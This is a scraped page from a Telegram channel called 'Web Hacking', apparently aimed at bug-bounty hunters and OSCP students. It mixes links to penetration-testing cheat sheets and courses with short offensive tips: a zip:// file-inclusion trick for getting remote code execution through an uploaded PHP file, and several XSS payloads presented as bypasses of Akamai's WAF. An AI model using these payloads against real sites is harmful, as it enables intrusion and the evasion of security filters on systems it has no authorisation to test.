Web Hacking – Telegram

Web Hacking

2.1K subscribers

41 photos

6 files

37 links

@CEH_training
@OSCP_training
@pfsense
@WifiHacking

Download Telegram

About

Blog

Apps

Platform

2.1K subscribers

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

❤‍🔥1

3.51K views06:07

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://casvancooten.com/posts/2020/05/oscp-cheat-sheet-and-command-reference/

OSCP Cheat Sheet and Command Reference

Updated May 18th, 2020
Since my OSCP certification exam is coming up, I decided to do a writeup of the commands and techniques I have most frequently used in the PWK labs and in similar machines. I aimed for it to be a basic command reference, but in writing…

2.49K views17:57

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://github.com/Ignitetechnologies/BurpSuite-For-Pentester

GitHub - Ignitetechnologies/BurpSuite-For-Pentester: This cheatsheet is built for the Bug Bounty Hunters and penetration testers…

This cheatsheet is built for the Bug Bounty Hunters and penetration testers in order to help them hunt the vulnerabilities from P4 to P1 solely and completely with "BurpSuite". - ...

4.21K views17:25

Bug Bounty Hunting Tip :-

If you can upload .zip file on target then:

1. Create a .php file (rce.php)

2. Compress it to a .zip file (file.zip)

3. Upload your .zip file on the vulnerable web application.

4. Trigger your RCE via:

( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )

30.7K views16:59

https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters

GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug…

A list of resources for those interested in getting started in bug bounties - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters

5.91K views06:10

Free for only 24hrs

https://www.udemy.com/course/broad-scope-bug-bounties-from-scratch/?couponCode=9943A2D06E764688003B

5.04K views19:27

https://portswigger.net/research/new-xss-vectors

PortSwigger Research

New XSS vectors

Transition based events without style blocks So, recently, I was updating our XSS cheat sheet to fix certain vectors that had been made obsolete by browser updates. Whilst looking at the vectors, the

👍2❤1

3.24K views16:47

https://github.com/mandatoryprogrammer/xsshunter

GitHub - mandatoryprogrammer/xsshunter: The XSS Hunter service - a portable version of XSSHunter.com

The XSS Hunter service - a portable version of XSSHunter.com - mandatoryprogrammer/xsshunter

👍2

3.39K views18:27

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://medium.com/@jonathan_fulton/web-architecture-101-a3224e126947

📌Follow @oscp_training

Web Architecture 101

The basic architecture concepts I wish I knew when I was getting started as a web developer

3.03K views04:49

10.2K views19:15

@WebHacking
@WifiHacking
@OSCP_training
@PfSense

79.7K views06:23

12.3K views17:10

SSRF

13.4K views17:41

https://t.me/bug_bounty_bootcamp

4.09K views19:55

Web Hacking pinned «https://t.me/bug_bounty_bootcamp»

19:55

Akamai WAF bypass

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

9.81K views15:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

3.11K views20:52

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

10.1K views05:10

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

👍4👌1

10.2K views05:39

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

10.5K views20:29